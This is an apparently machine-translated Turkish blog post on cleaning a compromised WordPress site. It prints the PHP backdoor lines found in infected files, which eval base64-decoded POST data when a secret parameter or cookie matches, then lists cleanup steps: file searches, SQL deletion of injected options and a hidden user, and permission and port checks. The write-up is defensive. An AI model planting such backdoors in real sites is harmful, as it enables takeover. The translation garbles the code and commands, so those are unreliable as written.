Bu yazıyı okumadan önce görmelisin Gönderi buradaki, bir şeyi anlamak için. :)
StealthSetts.com'daki blogların çeşitli dosyalarında, aşağıdaki kodlara benzer kodlar buldum, bu da virüsün bir sonucu olarak ortaya çıktı. sömürü de wordpress.:
<? php if ($ _ get [‘573ABCB060974771’] ==”8E96D1B4B674E1D2″) {Değirmen (Base64_Decode ($ _ post [‘dosya’])); çıkış; }?>
Ve
<? php if ($ _ çerez [’44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {Değirmen (Base64_Decode ($ _ post [‘dosya’])); çıkış; }?>
Yukarıdaki durumda dosya ile ilgili xmlrpc.php ki Uykuluama bir grep Sunucuda, kaynaklarda türünün çok sayıda kod olduğunu görebilirsiniz.

Enfekte Dosyaları Temizleme:
Ooookkkkyouak
1. En iyi çözüm, bittikten sonra yedeklemeve temiz veritabanı, onun SİLMEK dosyaları WordPress (WP-Config.php'i ve dikkatlice kontrol edildikten sonra kesinlikle WP platformu için olmayan dosyaları ve versiyondaki orijinal olanlara yükleyebilirsiniz. 2.5.1 (Bu vesileyle de bir WP sürümü yükseltmesi yaparsınız :): http://wordpress.org/download/ . Dikkatli bir kontrol yapabileceğinize güvenmiyorsanız, tema dosyalarını ortadan kaldırın.
Blogda hiç kullanılmayan temaların dosyalarının ve temanın basit değişikliğinin etkilendiği, bu sorunu çözmediği görülebilir.
./andreea/wp-content/themes/default/index.php:<? php if ($ _ çerez [’44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {Değirmen (Base64_Decode ($ _ post [‘dosya’])); çıkış; }?><? php get_header (); ?>
2. İçinde bulunan tüm dosyaları arayın ve silin: *_new.php, *_old.php, *.jpgg, *.Giff, *.pngg ve wp-info.txt dosyası varsa.
bulmak . -isim “*_new.php”
bulmak . -isim “*_old.php”
bulmak . -isim “*.jpgg”
bulmak . -isim “* _Giff”
bulmak . -isim “*_pngg”
bulmak . -isim “wp-info.txt”
3. /TMP , klasörleri arayın ve silin tmpywbzt2
SQL temizliği :
1. Tablo tablosunda wp_options Var olup olmadığınızı görün ve satırları silin: Internal_links_cache- ris_f541b3abd05e7962fcab37737f40fad8 Ve wordpress_options.
2. Ayrıca wp_options'ta Active_plugins Ve varsa silin, *_new.php, *_old.php, *.jpgg, *.Giff, *.pngg veya başka bir şüpheli uzantı ise, dikkatlice kontrol edin.
3. Masada WP_USERS, yanında yazacak hiçbir şeyi olmayan bir kullanıcı olup olmadığına bakın, sütunda user_nicename. Bu kullanıcıyı silin, ancak kimlik sütunundaki numarayı saklayın. Bu kullanıcının "WordPress" i kullanmak mümkündür. user_login Ve 00:00 0000-00-00 tarihinde oluşturulmuş gibi görünüyor.
4. Masaya git WP_USERMETA ve yukarıdaki kimliğe ait tüm satırları silin.
Bu SQL temizliğini yaptıktan sonra, devre dışı bırakın ve sonra bir eklenti etkinleştirin. (Blogda -> Gösterge Tablosu -> Eklentiler)
Sunucu Menkul Kıymetleme:
1. Hangi dizinlerin ve dosyaların olduğuna bakın ”yazılabilir"(CHMOD 777) ve onlara bir chmod Bu artık herhangi bir seviyeden yazmalarına izin vermeyecek. (CHMOD 644, örneğin)
bulmak . -Perm -2 –ls
2. Hangi dosyaların biti ayarladığını görün güney veya paten . Onlara koyulan dosyaları kullanmazsanız chmod 0 veya içeren paketi kaldırın. Çok tehlikelidirler, çünkü ayrıcalıklarla performans gösterirler ”grup"Veya"kök"Ve bu dosyayı yürüten normal kullanıcının ayrıcalıklarıyla değil.
Bul / -type f -perm -04000 -ls
Bul / -type f -perm -02000 -ls
3. Hangi bağlantı noktalarının açık olduğunu kontrol edin ve kullanılmayanları kapatmaya veya sabitlemeye çalışın.
Netstat -an | Kavrama -I listesi
Bu kadar. Bunu görüyorum Bazı bloglar yasaktır Google Search ve diğerleri tarafından "Onları yaptı !!!" diyor. . Peki, onları yaparlardı ... ama Google para kazanmaya başlarsa ne dersin? Tüm Siteler Kim Yapıyor Se spam ve Truva atları (Trojan.clicker.html) kurabiyelerde?
1 düşünce "WordPress istismarı – Virüs dosyalarını temizleme, SQL ve sunucu güvenliği.”